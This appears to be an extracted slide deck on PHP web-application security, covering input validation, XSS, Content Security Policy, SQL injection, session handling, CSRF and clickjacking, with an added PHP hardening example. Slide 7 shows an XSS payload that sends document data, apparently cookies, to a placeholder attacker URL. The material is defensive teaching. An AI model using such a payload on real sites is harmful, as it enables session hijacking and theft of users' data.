This document discusses principles and techniques for web development security, including validating user input, protecting against cross-site scripting (XSS) and SQL injection, managing session security, preventing cross-site request forgery (CSRF) and clickjacking, and using tools like Arachni for security testing. The pillars of information security are listed as confidentiality, integrity and availability. User input should be validated and output escaped to protect against attacks.
2. Pillars of Information Security
Confidentiality
Integrity
Availability
rafaelmonteiro / web-development-security
3. Principles
Multiple Layer Security
Consider that each layer will eventually fail
Provide the minimum amount of information required
4. Validate user input
Since HTTP requests can be manipulated client-side, all user input must be validated.
5. Protection
PHP offers the extensions ctype and filter. In addition, most frameworks implement some sort of data sanitization.
PHP 7+ provides type declarations that allow you to specify the expected type of parameters.
declare(strict_types = 1);
6. Cross-site scripting (XSS)
When a user-supplied script is stored and/or executed by the application.
7. Example
Assuming that an application allows input via the GET method, a malicious attacker can perform this injection:
<script>
(new Image()).src = "http://attacker_url/?" + escape(document.c
</script>
10. Protection
Same-origin Policy only allows access to code from the same origin (protocol/domain/port) of the application, while allowing access to external files (a lib such as jQuery, for example)
Filter user input (strip_tags, filter_var, preg_replace)
Escape output (htmlspecialchars, htmlentities, filter_var)
Apply Content Security Policy (default-src, img-src, script-src) -> delete inline code
11. Testing the CSP
In report-only mode the browser does not block violations; it only sends a report to the report-uri endpoint, so the policy can be tested before it is enforced.
Content-Security-Policy-Report-Only
report-uri /path/file.php
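As an added example (not code from the original deck), the reflected echo of a GET parameter from slide 7 is shown beside a hardened PHP handler that applies the measures of slides 10 and 11: filter on input, escape on output, and a CSP rolled out in report-only mode first. The parameter name q, the allowed-character pattern and the /csp-report.php endpoint are assumptions.

```php
<?php
declare(strict_types=1);

// Vulnerable (slide 7): the GET parameter is echoed unfiltered and unescaped,
// so a ?q=<script>...</script> payload runs in the victim's browser.
function render_vulnerable(array $get): string
{
    $q = $get['q'] ?? '';
    return "<p>You searched for: $q</p>";
}

// Hardened (slide 10): filter on input, escape on output.
function render_hardened(array $get): string
{
    $raw = $get['q'] ?? '';
    if (!is_string($raw)) {          // ?q[]=... must not reach strip_tags()
        return '<p>Invalid search term.</p>';
    }
    // Filter user input: drop any tags, then accept only a short, plain
    // term (letters, digits, spaces, basic punctuation; pattern is assumed).
    $q = filter_var(strip_tags($raw), FILTER_VALIDATE_REGEXP,
        ['options' => ['regexp' => '/^[\p{L}\p{N} .,-]{1,64}$/u']]);
    if ($q === false) {
        return '<p>Invalid search term.</p>';
    }
    // Escape output: quotes included, so the value is also safe in attributes.
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>You searched for: $safe</p>";
}

// CSP (slides 10 and 11): no 'unsafe-inline', so inline scripts are blocked
// even if an escaping bug slips through. Deploy in report-only mode first,
// read the violation reports at /csp-report.php (assumed endpoint), then
// switch to the enforcing header.
function send_csp_header(bool $reportOnly): void
{
    $policy = "default-src 'self'; script-src 'self'; img-src 'self'; "
            . "report-uri /csp-report.php";
    $name = $reportOnly ? 'Content-Security-Policy-Report-Only'
                        : 'Content-Security-Policy';
    header("$name: $policy");
}

// Usage (served through a web server, e.g. /search.php?q=shoes):
send_csp_header(true);
echo render_hardened($_GET);
```

With ?q=<script>alert(1)</script>, render_vulnerable() returns the script verbatim, render_hardened() rejects the term (strip_tags leaves alert(1), which fails the pattern), and the CSP would block the inline script regardless.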
12. SQL Injection
Protection
Do not concatenate data (parameters) with SQL queries
Validate user input
Use prepared statements
Escape characters
13. Session (State) Management
Protection
Use HTTPS
Set secure and HttpOnly flags
Prevent XSS
Session ID
Change the Session ID
Store some distinctive user information in the session
Detect session hijacking (token)
Use HSTS to hinder session hijacking
15. Cross-site Request Forgery (CSRF)
Delivered through malware, scams/phishing, or a malicious site/redirect
Protection
Submit an anti-CSRF token with each request
Do not use GET for operations involving data manipulation (just a good practice, because POST can also be manipulated)
16. Clickjacking
The attacker creates a fake page and, through requests to the target site (usually via an iframe), takes advantage of the user's session.
Protection
header('X-Frame-Options: DENY'); // or SAMEORIGIN